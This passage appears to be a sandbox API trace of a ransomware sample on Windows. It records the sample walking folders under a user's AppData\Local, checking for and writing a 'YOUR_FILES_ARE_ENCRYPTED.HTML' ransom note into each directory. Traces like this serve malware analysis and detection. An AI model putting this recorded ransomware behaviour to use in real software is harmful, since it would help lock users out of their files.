(lpFirst="PeerDistRepub", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.935] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\PeerDistRepub") returned 53 [0121.935] GetProcessHeap () returned 0x600000 [0121.935] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0121.935] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\PeerDistRepub" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\PeerDistRepub") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\PeerDistRepub" [0121.935] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\PeerDistRepub", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\PeerDistRepub\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\PeerDistRepub\\*" [0121.935] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\PeerDistRepub\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x73f4dcd0, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x73f4dcd0, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x73f4dcd0, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0121.936] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x73f4dcd0, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x73f4dcd0, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x73f4dcd0, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="..", cAlternateFileName="")) returned 1 [0121.936] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x73f4dcd0, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x73f4dcd0, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x73f4dcd0, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="..", cAlternateFileName="")) returned 0 [0121.936] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0121.936] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\PeerDistRepub\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 83 [0121.936] GetProcessHeap () returned 0x600000 [0121.936] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.936] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\PeerDistRepub\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\peerdistrepub\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0121.937] WriteFile (in: hFile=0x30c, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0121.937] CloseHandle (hObject=0x30c) returned 1 [0121.938] GetProcessHeap () returned 0x600000 [0121.938] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.938] GetProcessHeap () returned 0x600000 [0121.938] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0121.938] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc699b5c, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc699b5c, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc699b5c, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="Publishers", cAlternateFileName="PUBLIS~1")) returned 1 [0121.938] StrStrIW (lpFirst="Publishers", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.938] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers") returned 50 [0121.938] GetProcessHeap () returned 0x600000 [0121.938] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0121.938] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers" [0121.938] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\*" [0121.938] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc699b5c, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc699b5c, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc699b5c, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0121.938] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc699b5c, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc699b5c, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc699b5c, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="..", cAlternateFileName="")) returned 1 [0121.938] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc699b5c, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x64b8a5bf, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64b8a5bf, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="8wekyb3d8bbwe", cAlternateFileName="8WEKYB~1")) returned 1 [0121.938] StrStrIW (lpFirst="8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.938] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe") returned 64 [0121.938] GetProcessHeap () returned 0x600000 [0121.938] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.939] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe" [0121.939] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\*" [0121.939] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc699b5c, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x64b8a5bf, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64b8a5bf, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ec18, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x626638 [0121.939] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc699b5c, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x64b8a5bf, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64b8a5bf, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ec18, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0121.939] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc699b5c, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc699b5c, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc699b5c, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ec18, dwReserved1=0xffffffff, cFileName="Fonts", cAlternateFileName="")) returned 1 [0121.939] StrStrIW (lpFirst="Fonts", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.939] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Fonts") returned 70 [0121.939] GetProcessHeap () returned 0x600000 [0121.939] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0121.940] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Fonts" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Fonts") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Fonts" [0121.940] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Fonts", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Fonts\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Fonts\\*" [0121.940] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Fonts\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc699b5c, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc699b5c, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc699b5c, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0121.940] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc699b5c, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc699b5c, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc699b5c, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 1 [0121.940] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc699b5c, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc699b5c, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc699b5c, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 0 [0121.940] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0121.940] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Fonts\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 100 [0121.940] GetProcessHeap () returned 0x600000 [0121.940] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.940] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Fonts\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\publishers\\8wekyb3d8bbwe\\fonts\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0121.941] WriteFile (in: hFile=0x338, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.942] CloseHandle (hObject=0x338) returned 1 [0121.942] GetProcessHeap () returned 0x600000 [0121.942] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.942] GetProcessHeap () returned 0x600000 [0121.942] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0121.942] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64b8a5bf, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64b8a5bf, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64b8a5bf, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ec18, dwReserved1=0xffffffff, cFileName="Licenses", cAlternateFileName="")) returned 1 [0121.943] StrStrIW (lpFirst="Licenses", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.943] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Licenses") returned 73 [0121.943] GetProcessHeap () returned 0x600000 [0121.943] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0121.943] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Licenses" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Licenses") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Licenses" [0121.943] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Licenses", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Licenses\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Licenses\\*" [0121.943] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Licenses\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64b8a5bf, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64b8a5bf, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64b8a5bf, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName=".", cAlternateFileName="")) returned 0x626778 [0121.943] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64b8a5bf, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64b8a5bf, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64b8a5bf, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 1 [0121.944] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64b8a5bf, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64b8a5bf, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64b8a5bf, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 0 [0121.944] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0121.944] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Licenses\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 103 [0121.944] GetProcessHeap () returned 0x600000 [0121.944] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.944] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Licenses\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\publishers\\8wekyb3d8bbwe\\licenses\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0121.945] WriteFile (in: hFile=0x338, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.946] CloseHandle (hObject=0x338) returned 1 [0121.947] GetProcessHeap () returned 0x600000 [0121.947] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.947] GetProcessHeap () returned 0x600000 [0121.947] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0121.947] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec8fc8aa, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec8fc8aa, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec8fc8aa, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ec18, dwReserved1=0xffffffff, cFileName="Microsoft.WindowsAlarms", cAlternateFileName="MICROS~1.WIN")) returned 1 [0121.947] StrStrIW (lpFirst="Microsoft.WindowsAlarms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.947] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Microsoft.WindowsAlarms") returned 88 [0121.947] GetProcessHeap () returned 0x600000 [0121.947] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0121.947] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Microsoft.WindowsAlarms" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Microsoft.WindowsAlarms") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Microsoft.WindowsAlarms" [0121.947] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Microsoft.WindowsAlarms", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Microsoft.WindowsAlarms\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Microsoft.WindowsAlarms\\*" [0121.947] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Microsoft.WindowsAlarms\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec8fc8aa, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec8fc8aa, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec8fc8aa, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0121.947] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec8fc8aa, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec8fc8aa, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec8fc8aa, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 1 [0121.947] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec8fc8aa, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec8fc8aa, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec8fc8aa, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 0 [0121.947] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0121.947] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Microsoft.WindowsAlarms\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 118 [0121.947] GetProcessHeap () returned 0x600000 [0121.947] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.947] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Publishers\\8wekyb3d8bbwe\\Microsoft.WindowsAlarms\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\publishers\\8wekyb3d8bbwe\\microsoft.windowsalarms\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0121.948] WriteFile (in: hFile=0x338, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.949] CloseHandle (hObject=0x338) returned 1 [0121.951] GetProcessHeap () returned 0x600000 [0121.951] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.951] GetProcessHeap () returned 0x600000 [0121.951] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0121.951] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec8fc8aa, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec8fc8aa, ftLastAccessTime.dwHighDateTime=0x1d70070, 